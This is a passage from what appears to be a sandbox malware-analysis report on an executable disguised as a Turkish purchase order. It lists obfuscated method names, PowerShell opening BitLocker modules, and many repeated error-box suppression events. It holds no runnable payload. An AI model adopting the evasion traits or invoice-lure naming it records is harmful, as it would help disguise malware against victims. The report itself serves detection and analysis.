                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, lWh876djFb4mgoa5Qd.csHigh entropy of concatenated method names: 'xhlASqFSHD', 'xVFAPV8biv', 'TrcANYEFTg', 'vNJA28iqqQ', 'IsAAct6u0I', 'lfpAxjK02w', 'YFVApgWlYl', 'WxeA1TiKnN', 'XvaA6OLWkq', 'CvXAa3mwVg'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.csHigh entropy of concatenated method names: 'TMVogbQWrK', 'ocRobafTPZ', 'LskoE3jg1h', 'Q5qoHscLBi', 'jRyoBm16JF', 't2oo8yb0IJ', 'm4wov77YuB', 'RsQonbe4kU', 'WlWoZPYxh7', 'MgKoXBRHxe'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, UhZaceHVUu2xTLG9vZ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hsbWdBjTGS', 'bmNWib3Ntn', 'hrjWzIQjGb', 'j8soFkWp7F', 'MVXoC0OLNZ', 'EENoWkUuno', 'qvMoopQUMv', 'qGridm3gXXFCZ4N6guf'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, A3BY3JWkboPgNObEN9.csHigh entropy of concatenated method names: 'bChka5c3j', 'MIkDCwo3n', 't80hh2skC', 'BBF3i4Unm', 'PuhRjr5kA', 'ml1KRxMKM', 'zd292xSPiVoOhrFiEt', 'LjRS4brupWp5JuKffC', 'idVUMEALE', 'Cbv4gdnb6'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, ggd4Fy6La0clJsEhZS.csHigh entropy of concatenated method names: 'Fk4vtc0BxF', 'PhHvlAxWtG', 'd4CvktmTST', 'WYevDNc4bI', 'JGgvmWhQfa', 'hhnvhw6ZcE', 'jiwv3XUkp2', 'GyFveYr3db', 'SlyvR0u61F', 'trdvKdEeRT'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, uI4q7ki1a4S38bXmTY.csHigh entropy of concatenated method names: 'wWr4HZ6BAe', 'mDk4BpERJE', 'Fsi48T20pQ', 'h1K4vGa6Cs', 'Gam4AwvPcy', 'jnO4nKUJXg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, BXfOJmeNvhyHxF6xHc.csHigh entropy of concatenated method names: 'QoHEyVFUR7', 'X7SEJoE3sD', 'O1sEfyDV65', 'w7bEQLH974', 'fCcErApb9S', 'V7UELJTsZT', 'pbSEwWJy7H', 'I91E543seg', 'jE3EdxTVpd', 'qVJEi0uyYd'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, M6p3kLS4158nyV1U3j.csHigh entropy of concatenated method names: 'ejS8gjoIv1', 'smh8EY4KLi', 'G0x8BoNjDu', 'ngJ8vq86kb', 'W7p8nj8glu', 'K4TBrs7G1y', 'kIoBLxHvqR', 'k4DBw20o6E', 'zSbB5KcwQA', 'gC6BdMOK6G'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
